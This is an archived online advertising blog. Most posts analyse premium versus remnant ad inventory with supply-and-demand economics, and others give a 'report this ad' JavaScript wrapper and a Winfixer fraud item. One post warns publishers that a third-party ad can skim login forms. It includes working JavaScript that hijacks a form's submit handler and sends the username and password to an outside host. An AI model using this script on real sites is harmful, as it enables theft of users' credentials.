Notice: This blog is no longer updated. You may find a broken link or two

You can follow my new adventures @mikeonwine


Microsoft just published a paper titled Demographic Prediction Based on User’s Browsing Behavior. Humm… Microsoft… get with the party. Seems your “research paper” is remarkably similar to this patent, User profile classification by web usage analysis, which was filed by Xerox on November 1st, 2001. Microsoft claims a 30% improvement in accuracy… yet Xerox claimed 76% accuracy back in 2001, and MSFT claims 79% in 2007.

The technology (although not so “new”) is fascinating. Based on the websites that you visit, four out of five times a smart statistician can predict your gender correctly.

I spent the last hour trying to prove an idea I’ve had for a while. Say you wanted to steal users’ login information for various social networking sites, grab their personal info and do who knows what with it. Well guess what… it’s super easy to do if you can somehow get an ad (either a third-party tag or Flash) on the login page of your victim site. This shouldn’t be too difficult since so many sites have login forms on practically every page.

Ok, how do you do it? Let’s pretend you have a web page that has the following form on it:

<form method="post" action="do_login.php" id="passform">
<b>User:</b><input type="text" name="username" /><br>
<b>Pass:</b><input type="password" name="mypass" /><br>
<input id="submitbutton" type="submit" value="Submit password"/>
</form>

This is one of the most basic HTML forms: it simply takes a username and password and submits them to a login page. Normally when you fill out this form you click submit and end up logged into the website. Now, let’s imagine that we show an ad on this page. Our sketchy player above decides that he is going to steal your info using an advertisement, and guess what, it’s remarkably easy. Let’s say we have the following ad tag on the page:

<script type="text/javascript" src="http://www.tenantnetwork.com/badad.js"></script>

This is a very standard way of serving ads. You’ll see it pretty much all over the web. There are also various ways to execute JavaScript in the browser: you can do it directly if you can serve a third-party tag, and Flash has various mechanisms for executing JavaScript as well. So, how do we steal your info? Super easy… here’s the JavaScript to do it :)

 theForm = document.forms['passform'];
 oldsubmit = theForm.onsubmit;
 theForm.onsubmit = function () {
    user = theForm.childNodes[2].value;
    pass = theForm.childNodes[6].value;
    window.open('http://www.tenantnetwork.com/steal_pass.php?pass=' + pass + '&user=' + user,
                 "mywindow","menubar=0,resizable=0,width=350,height=150");
    oldsubmit();
 } ;

 document.write('<img src="http://www.tenantnetwork.com/samplead.gif"/>');

So what does this code do? We store a copy of the form’s original onsubmit handler in “oldsubmit”, then replace the handler with our own, which grabs the username and password you’ve typed in, sends them to a third-party website and then calls the original handler. I happened to choose my failed real estate site, as it was the only third party I could get access to =). Not bad right? Note that I transmitted the info using a popup window, but I’m sure the smarter guys out there could think of a hundred different ways of doing this.

Own a website that people login to? I would highly recommend removing any and all untrusted third party content from pages that have sensitive information.
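If you can't drop the ad from a sensitive page entirely, one option is to keep the third-party tag out of the page's own DOM. The following is a minimal sketch, not a complete defense. It assumes a browser that supports the standard `sandbox` attribute on iframes and an ad that can be served as a standalone page. The helper names (`escapeAttr`, `sandboxedAdFrame`) and the ad URL are hypothetical.

```javascript
// Hypothetical helper: escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical helper: returns markup for an ad slot isolated in a sandboxed iframe.
// Assumption: the ad can be served as a standalone page at adUrl.
function sandboxedAdFrame(adUrl, width, height) {
  // "allow-scripts" lets the ad run its own JavaScript; leaving out
  // "allow-same-origin" gives the frame a unique origin, so its script
  // cannot read or modify the embedding page's forms.
  return '<iframe sandbox="allow-scripts" src="' + escapeAttr(adUrl) + '"' +
         ' width="' + Number(width) + '" height="' + Number(height) + '"' +
         ' frameborder="0" scrolling="no"></iframe>';
}

console.log(sandboxedAdFrame("https://ads.example.com/ad.html", 350, 150));
```

The trade-off is that a frame sandboxed this tightly also cannot open new windows, so a real ad slot would likely need extra sandbox tokens (such as `allow-popups`) for click-throughs to work.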

I’ve put together a very simple working example here. This page shows a login form with a third party ad. Try putting in a random username and pass; you should see a popup from the “third party” that served the ad with a nice little message =).

IAB released some more stats this past week, and it looks like performance spending is growing quickly. In 2005 performance-based ads were 41% of online display dollars, and this year they’re 47%. (Also note that in 2005 it was 5.1 billion and in 2006 7.9 billion.) Huge growth!

Read the article on MediaPost here.

If you haven’t already, be sure to read Part I and Part II first.

We’ve already discussed my two major reasons why we should stop talking about premium vs. remnant, namely:

  1. Inventory is deemed premium based on the buyer and has absolutely nothing to do at all with the actual ad impression being sold
  2. The best techniques for maximizing revenue for publishers are not specific to performance or brand

In this post I’d like to talk about remnant specifically. Looking at recent patterns, I expect non-reserved inventory to grow at a far faster pace than reserved inventory. Specifically, I think more and more dollars are going to shift from traditional reserved inventory over to unreserved. Here are five reasons why:

1. Brand advertisers are starting to care about performance

All advertisers are realizing how much quality matters. Although brand metrics might be fuzzier than pure conversion metrics, an ad on Yahoo’s homepage will perform better than on a random article page on the New York Times. More and more brand advertisers are realizing that they can efficiently track performance with online media. The challenge is, how do you track performance when there is no direct online purchase? Sure, clicks measure some sort of performance, but a click from one person might be worth far less than a click from another.

As more inventory becomes available, I expect brand focused advertisers to think of more and more inventive ways to track campaign performance. My Coke Rewards is a great example of a traditional brand advertiser tying traditional sales with online performance. I’ve seen these ads everywhere and I’m sure they’re tracking signups and repeat visitors per media buy.

2. You cannot reserve inventory and optimize on performance

Reserving means setting a price before you buy. Setting a price before you buy means that you can’t adjust your price based on how different slices of inventory perform. Although you can track performance with a reserved/premium buy, you cannot easily optimize. Changing pricing will be a manual and slow process.

3. Ad quality differs greatly between publishers

I’ve looked at a lot of data over the past couple years and performance between sites differs greatly. Some sites will literally have 100x the click and conversion rates of crappier sites. Quality impacts price, and this huge differential in price makes it rather difficult to reserve inventory. Combine this with #1 and #2 above, and any advertiser who wants to buy effectively is going to have to start pricing based on performance. This means fewer bulk fixed reserved buys and more CPC, CPA and easily adjusted CPM campaigns. As I pointed out in Part I and Part II of this series, whether or not inventory is premium or remnant depends solely on who the buyer of the impression is, not the actual impression. Hence, fewer reserved, guaranteed buys means more remnant inventory.

4. Optimization technologies are getting better

It’s amazing what people are coming up with these days. Optimization technologies are getting a lot of press these days, and it seems that at every Ad-Tech there are a couple dozen new companies with some new cool modeling technology. I’ve worked with a couple of these companies and it seems that every one I talk to is better than the last. As these technologies improve, the incentive to buy based on performance becomes far more interesting than buying a fixed chunk of inventory at a flat rate — hence, more remnant.

5. User-Gen content is growing like crazy

There’s just a plain shitload of user-gen content out there nowadays. Myspace, Facebook, Youtube, Xanga, Photobucket… shall I keep going? Most of this inventory goes unreserved. Everyone is expecting this to grow more and more.

Thoughts

A lot of the arguments above are dependent on my definition of premium as any reserved inventory. Essentially I believe that more and more online buying is going to move towards performance based pricing. This will strike a good blow to the traditional “premium vs. remnant” selling strategies. It’s also about time we start to talk about the marketplace as a whole, not as two separate worlds.

In fact, I think we should scrap the word ‘remnant’ altogether. Hell, let’s scrap the word premium too! Instead of these two, let’s talk about pre-reserved vs. optimized inventory. Or the forward-contract vs. spot-exchange markets. How about relationship vs. performance based advertisers? Anything but premium vs. remnant!

Just saw this ad for the US Air Force. Seems they’ve taken a pointer from all the “shoot the duck for a free ipod” ads, except with a bit of an army twist! “Rollover the hotspot to attack”.

Amazing…

Update: Seems that you can’t actually “attack” the guy when the flash is embedded from my site. Will see if I can fix, but basically when you click on each ‘hot spot’ an attack dog comes out and tackles the guy.

In Part I we discussed some basic economics and then analyzed the aggregate supply curve that we see in online advertising. We also brought to the table one argument against ‘premium’ vs ‘remnant’. In this post we will look at the demand side of the equation and discuss some arguments for and against splitting out the advertiser market.

What is Demand?

Whereas the supply curve modeled all the possible sources of ad inventory, the demand curve models all the individuals that want said inventory and have the dollars to buy it. There are many different types of buyers out there, and everyone will put them in different buckets. It’s actually quite confusing: some say ‘premium v. remnant’, some say ‘brand v. performance’ and some others will give you 18 different categories of buyers. Big brand, small brand, big performance conscious brand… etc. etc. etc. For the purposes of this post we will stick with ‘premium’ and ‘remnant’. We will consider premium the pre-reserved demand and remnant everything else.

Premium Demand

Typically coming from ad agencies, premium demand has some very interesting characteristics. As Greg Yardley pointed out in the comments of Part I, it’s not so much ‘premium’ as a ‘forward contract’. What this means is that most will consider premium “premium” not because it’s special, but simply because someone has reserved this inventory beforehand. The majority of reserved inventory goes to agencies. Agencies want to ensure that they spend all of their allocated budget by the end of the month/quarter, hence they reserve large portions of inventory beforehand to ensure they hit their goals.

Because of the nature of agency budgets and reservation systems, short term premium demand is simply a fixed dollar amount. Think about it: agencies get a certain budget to spend for the quarter and fight their hardest to spend every last penny. If they don’t then they’ll have less money to spend next quarter. Now of course agencies will try to get the best inventory possible for the amount of money that they have to spend, but it’s really a battle between publishers as to how big a slice of the premium money pie they can get.

Let’s take a hypothetical economy which has premium advertisers that want to spend $10,000. These advertisers will pay a rate that depends primarily on the amount of inventory that is available to them. If the marketplace only had one million impressions available, then the advertiser would buy the inventory for $10 CPM (CPM = cost per mille, or price per thousand impressions). That way:

$10.00 CPM * 1M imps = $10,000

On the other hand, if there were ten million impressions available for purchase then the advertiser would simply pay $1 CPM. That way:

$1.00 CPM * 10M imps = $10,000
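The same arithmetic works for any fixed budget. Here is a small sketch of it; the function names are mine, purely for illustration, and not part of any ad-serving API:

```javascript
// CPM is the price per thousand impressions, so a fixed budget spread over
// all available impressions implies: cpm = budget / (impressions / 1000).
function cpmForFixedBudget(budgetDollars, impressions) {
  if (impressions <= 0) {
    throw new RangeError("impressions must be positive");
  }
  return budgetDollars / (impressions / 1000);
}

// The implied price at each of several supply levels, as (impressions, cpm) pairs.
function pricesForFixedBudget(budgetDollars, quantities) {
  return quantities.map(function (q) {
    return { impressions: q, cpm: cpmForFixedBudget(budgetDollars, q) };
  });
}

console.log(cpmForFixedBudget(10000, 1000000));   // 10
console.log(cpmForFixedBudget(10000, 10000000));  // 1
console.log(pricesForFixedBudget(10000, [1000000, 2000000, 5000000, 10000000]));
```

Whatever quantity you plug in, the CPM times the number of thousands of impressions comes back to the same $10,000.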

Starting to get the picture? “But Agencies care about performance!!” you might respond…. Well, how do you track ‘performance’ for Ford? Are you going to track the number of cars that people buy online? Brand metrics are fuzzy by nature: people track “aided brand awareness”, “message association” and “brand favourability” (source)! Well, enough words! We can quite easily depict the “fixed $ demand” idea as a demand curve. If we know that $10,000 will go to premium advertisers then, as shown above, we can calculate the price that will be paid for each possible quantity of inventory. Price × Quantity must equal the total dollar demand at each point. If we plot all the points we would get something like this:


Graph 3

Ok, so now it’s pretty easy to show what would happen in a world where there was only ‘premium demand’, and a fixed amount of short term supply. You’d simply get:


Graph 4

The equilibrium price, ‘Pe’ would simply be the intersection of the ‘premium demand’ and the fixed supply curve. No matter what the quantity is, the total value of the market stays the same — it’s simply the amount of dollars allocated for that time period. The rates will simply change according to how much supply is available.

“Remnant” Demand

Of course the world really isn’t that simple. Enter remnant demand. I myself have never really liked the term remnant, but that’s primarily because way too many people pronounce it remAnant. So what is it? I guess people will have their own definitions, but I would classify it as anything that hasn’t been reserved at a fixed price. Any CPA or CPC based deal would most likely classify as remnant, as well as any non-guaranteed CPM buys.

Remnant demand is a little more sensible than premium demand — performance will generally matter for these advertisers. This means that there is no longer a ‘fixed’ amount of money flowing into the marketplace, rather, the amount differs depending on the quantity and price at any given point in time. If inventory is cheap an advertiser will buy higher quantities than if the inventory is more expensive. Visually it would look something like this:


Graph 5

The price paid to the publisher would be the intersection of the two curves, OR, if he is successful at some basic price discrimination, it may be the area under the remnant demand curve (my economics is getting fuzzy). The really interesting question is: what happens when you combine remnant and premium?

The Aggregate Demand Curve

The way to combine the interaction of the premium and remnant demand curves is to think like a publisher. First, let’s overlay the two graphs:


Graph 55

Now, let’s imagine that all supply is controlled by one publisher and that, as this publisher, we are guaranteed the $10k in premium demand and simply have to figure out how to price our inventory to maximize our total revenue. Well, let’s think about this. Imagine that the quantity of inventory available in the marketplace sits very close to the left of the graph, a bit to the left of the intersection of the premium and remnant demand curves. At this point the supply curve intersects the two curves where the premium curve is above the remnant curve, hence the publisher will allocate all of his inventory to premium demand. This makes a lot of sense, right? The premium advertiser will pay a higher price, which nets the publisher higher revenue.

So here’s the question: what happens when supply lies to the right of this intersection? Well, what would you do if you were the publisher? What I would do is pretty simple. I’d convince premium advertisers that they have to pay more to reserve, and allocate the portion of my inventory to the left of the intersection to them at a high price, one that would generally be higher than what remnant advertisers would pay. All other inventory I would sell to remnant advertisers. Ok, so what does this look like? Well, simple! We simply vertically add the two curves as follows:


supply_demand_6.jpg

We can simply combine the premium and remnant demand curves to form the aggregate demand curve.

Let’s get back to the point

Ok, so that was a whole buncha mumbo jumbo economics. What was the point? We drew some fancy curves and discussed some intersections… so what? Well, we were talking about premium and remnant, specifically why people should stop splitting out the online ad market between the two. Well, how does the above help us? Well first off, from a marketplace perspective it is not difficult to combine premium and remnant. This is my second argument against splitting out the two. When a publisher is trying to maximize revenue, he should be thinking about aggregate demand, not premium and remnant.

Think about some things that might maximize revenue:

  1. Improve page quality for ad performance
  2. Attract more and higher quality users
  3. Increase visitor frequency
  4. Improve sales efforts
  5. Improve monetization/optimization tactics
  6. Leverage behavioral data

How many of these apply solely to premium or remnant? None of them. All of the above are tools that a salesperson can use to grab a bigger piece of the premium pie. All of the above are also things that can help performance advertisers optimize their campaigns. Sure, selling to premium advertisers is different from selling to remnant advertisers, but that can easily be solved by hiring diverse salespeople and focusing them on the right areas. Nowadays most publishers get a significant portion of their revenue from remnant, hence when talking about growth rates in revenue we are really talking about growth in aggregate demand. Here’s the thing: the best techniques for maximizing revenue for publishers are not specific to performance or brand.

So all you fancy wall street analysts — when you’re asking large publishers whether their new focus on behavioral technologies will decrease revenues from premium inventory — stop and think about what you’re saying. There is no such thing as ‘premium inventory’. There is ‘premium demand’, but except for sales no company should make it one of their strategic goals to increase their share of this pool.

Final Thoughts

Before Greg can steal some of my thunder again: Part III of this series will be about the growth of remnant and why I expect growth rates in “premium demand” to slow whereas “remnant demand” will continue to grow drastically (no, it’s not related to social networking). I would also like to mention in the spirit of full disclosure that I know very little about the agency business and most of the statements I made above are based on things I’ve heard from colleagues and friends but not from personal experience.

Also — my economics are definitely fuzzy. I wish I had more time to go and read my old textbooks again, but sadly that isn’t the case. I would greatly appreciate pointers on mistakes I’ve made as I’m sure I’ve oversimplified the problem by quite a bit.

Readers — I’ve been looking for a breakdown of online advertising dollars by buyer-type (e.g. Agency, Direct Marketer, etc.), and can’t seem to find a reliable source anywhere. Does anybody know where I can find reliable figures?

If there is one thing that I have yet to understand about the online advertising business, it is the insistence on splitting available inventory into two buckets: premium and remnant. Well, I’ve had enough of it. I’m going to lay out my arguments as to why this differentiation is plain silly, and I challenge all that use these terms to tell me why in heaven’s name you should continue to use them. Don’t get me wrong, from a sales perspective it makes sense to split efforts into Agency & Others (e.g. Premium & Remnant), but from an overall monetization perspective it does not. Yet, when Yahoo held a call with analysts to discuss the Right Media acquisition, multiple “wall street experts” asked questions like “How is this going to impact pricing on remnant?” and “Does this mean that Yahoo will focus more on remnant monetization than premium?” (not direct quotes, as I couldn’t find a transcript anywhere). Hopefully I can make a good case.

Some Basic Economics of Supply & Demand

Let’s start off by discussing some very basic economics: supply & demand. In today’s online advertising marketplace, supply is provided by publishers with ad inventory to sell and demand comes from advertisers and marketers that have dollars to spend. In a traditional supply and demand model suppliers have some flexibility in terms of the amount of goods that they can produce, and buyers will vary the goods they buy based on the market price. E.g., there are very many young kids that would buy an XBox for $10, but Microsoft wouldn’t put very many systems on shelves at that price. So through normal market mechanics some sort of balance of price and quantity is found, which is generally the intersection of the supply & demand curves. (By the way, if all of this is foreign to you, please go read this wikipedia article.) Here’s an example of a traditional supply/demand curve:


supply_demand_11.JPG

Note that these graphs generally refer to the short term. E.g., think of this as a ‘snapshot’ today, or this month. Over the year, Microsoft may change the way they produce Xboxes and this might change the behavior of their entire supply curve. Also, Nintendo might come out with a competing product which pushes the demand curve down.

‘Supply’ in Online Advertising

Now, this simple model doesn’t apply to very much at all as every single product/commodity/industry is slightly different. Online advertising itself is a rather peculiar case, especially on the Supply side of things. First of all, how do we measure supply? Well, most people you ask would probably say “impressions, DUH!“. WRONG. One impression is most definitely not the same as another. A well educated male user with a high income interested in buying a car is worth a heck of a lot more than a 14 year old girl posting on her Myspace page. That’s the thing — the quality of supply changes not only per publisher, but also per user and page. Certain users are worth more… Certain pages are also worth more, not because contextual technology might work, but because the ad might be displayed more prominently, or because this is a page that users tend to stay on for a long time.

Ok, so now what? Well, theoretically we could draw out one individual supply curve for every possible combination of user quality and page, but obviously that’s not very feasible. What we can do is aggregate all of these together into a more theoretical “aggregate supply curve”. Normally aggregate supply is used when observing markets as a whole… which seems fitting here. Now, a normal aggregate supply curve is upward sloping as in the figure above — this is not the case in online advertising.

What’s interesting in online advertising is that publishers do not control the amount of inventory they have. Think about it — you’re the New York Times — is there any way that you could influence the number of visitors to your site TODAY? I guess theoretically you could advertise, but considering this isn’t very cost effective (e.g. a click costs a lot more than the impressions you’d garner), we’ll ignore this case. You could also make the argument that at a certain price the publisher should simply stop serving ads to reduce the overhead in bandwidth and various leasing fees that may come with his adserving solution. The problem is, the publisher won’t know what the price is until after he has sent the impression to his adserver, at which point you might as well serve even the cheapest ad as some money is better than nothing. So what does that mean for our supply & demand curves? Well, rather simple — we simply get a straight line, as follows:


supply_demand_2.jpg

In the graph above, the price for inventory is determined solely by demand. Note that I didn’t draw any separation on the supply side between “premium” and “remnant”. You simply can’t, because there really is no differentiation on supply based on these two factors. One impression on Yahoo! Mail’s login page for a twenty year old male might be premium one second and remnant the next. It’s not dependent on any supply factors, simply on which type of advertiser is buying the inventory. So here comes the first argument against premium & remnant: inventory is deemed premium based on the buyer and has absolutely nothing to do at all with the actual ad impression being sold.

Why is it that we would refer to them differently when the actual inventory is the same? It’s not like we can split the inventory — the same impression can be premium one day and remnant the next. So that’s the first reason why I think the market should stop thinking about “premium vs. remnant”, and instead look at overall supply.

Some Final Thoughts on ‘Supply’

One of the things that I struggled with greatly while writing this post was actually how to model supply. I was hoping to do something fancier than simply place a straight line on my graph. Why is this? Well — as I mentioned above, supply is really a function of user quality, page quality and user timing. For example, the same user on the same page is more valuable the first time he looks at it than the second. How does one forecast this? Intuitively I think people know that the growth rate in supply today is mostly in low quality inventory. Why? Well, people talk about “remnant” inventory growing with sites like Myspace, Youtube and Photobucket. This inventory has very high user frequency, generally low ages and hence is lower quality.

If someone has had some luck actually coming up with a good way to theoretically model a publisher’s supply I would love to hear it. Actually.. just post a comment!

Stay tuned for Part II. We’ll look at demand, and provide more arguments as to why the phrase “premium vs. remnant” should never again be uttered when discussing the online advertising industry.

For publishers, one of the most frustrating aspects of dealing with ad networks is probably the powerless feeling you get when one of your users complains about a particularly offensive, annoying or suggestive ad that they just saw. So what can you do? Here’s a quick and easy method to provide a “report this ad” button for your site.
Here’s the normal process of an ad call:
– You put a tag on your page: <script src="some.adserver.com/someparameters"></script>
– The browser requests the JavaScript, which returns something like: document.write('<img src="some.ad.com/ad.jpg"/>');
– The user sees some.ad.com/ad.jpg

So how do you create a button to ‘report an ad’? Simple! You simply create a wrapper function around document.write() to capture all the output. Then, all you need to do is a little bit of smart JavaScript and badabing you’re done! Credits to this page for the document.write JS.

So how do you wrap document.write()? Rather easily! Check out this IE-specific example:

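var writeOutput = "";   // collects everything the ad tag writes

(function(){
        // keep a reference to the browser's own document.write
        var documentWrite = document.write ;
        var createWrapper = function(s){
                writeOutput = writeOutput + "\n\n" + s;
                return s;
        };

        // every call is recorded first, then passed through to the original
        document.write = function(s){
               documentWrite(createWrapper(s) );
               document.close();
        }
})();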

As you can see this is remarkably simple. Every time document.write() is called we simply append the call to a variable ‘writeOutput’, which you can then do whatever you want with. I’ve created a fully functional example that has the full browser compatible javascript. It takes the writeOutput from an RMX Direct tag and puts it in a textarea at the top. You can grab the javascript by just viewing the source. The PHP code for “report_ad.php” is extremely simple:

$adcontent = htmlentities($_POST["adcontent"]);
$report = htmlentities($_POST["addetails"]);

echo "<b>Here is the email you send yourself:</b><br><br>\n";

echo "<b>Subject:</b> Uhoh, someone reported an ad!<br>\n";
echo "<b>User Comments:</b> $report<br><br> Here is what happened on the page when the user saw the ad:<br><br>\n";

Now, it’s important to realize that this isn’t a perfect way to do it. If the advertiser is wrapping content in an IFRAME then this method will simply show you the IFRAME source. Also, I’m not sure this will work for all networks. I’ve tested it with RMX Direct and Fastclick/Valueclick and it seems to work for both. In the document.write() output you can clearly see the source for the flash files being served. In any case, I hope this will be useful to somebody.
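For readers who want to experiment outside IE, here is a minimal sketch of the same wrapping idea. It is not the code from the example page. It assumes you pass in the document object yourself (`doc`) and that `doc.write` is an ordinary function with a `call` method. The name `captureDocumentWrite` is hypothetical.

```javascript
// Hypothetical helper: wraps doc.write so every string an ad tag writes is
// recorded before being passed through to the original method.
function captureDocumentWrite(doc) {
  var originalWrite = doc.write;
  var captured = [];

  doc.write = function (s) {
    captured.push(String(s));
    // Call the original with doc as "this" so a native write keeps working.
    return originalWrite.call(doc, s);
  };

  return {
    // Everything written so far, separated by blank lines.
    output: function () { return captured.join("\n\n"); },
    // Put the original method back once the ad tag has run.
    restore: function () { doc.write = originalWrite; }
  };
}

// Usage with a stand-in object, so the sketch also runs outside a browser.
var fakeDoc = { written: [], write: function (s) { this.written.push(s); } };
var capture = captureDocumentWrite(fakeDoc);
fakeDoc.write('<img src="http://some.ad.com/ad.jpg"/>');
console.log(capture.output());
```

In a page you would call `captureDocumentWrite(document)` before the ad tag and send `capture.output()` along with the user's report. The IFRAME caveat above still applies: you only capture what is written into your own document.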

Lawyer sleuths out mystery around ‘Winfixer’

Video of “end user experience” posted on Youtube: Fraudware Special Report:

Proving the link to the alleged perpetrators, their connections to Winfixer all the way through to the effects on Ochoa’s computer will be very difficult, she said.

“Forensics is everything,” she said.

This is very very true. If you look at my ‘Errorsafe‘ page, you see that the whois registration for each domain varies widely. This is a great step and I wish them the best of luck in tracking down the responsible parties and shutting down their operations.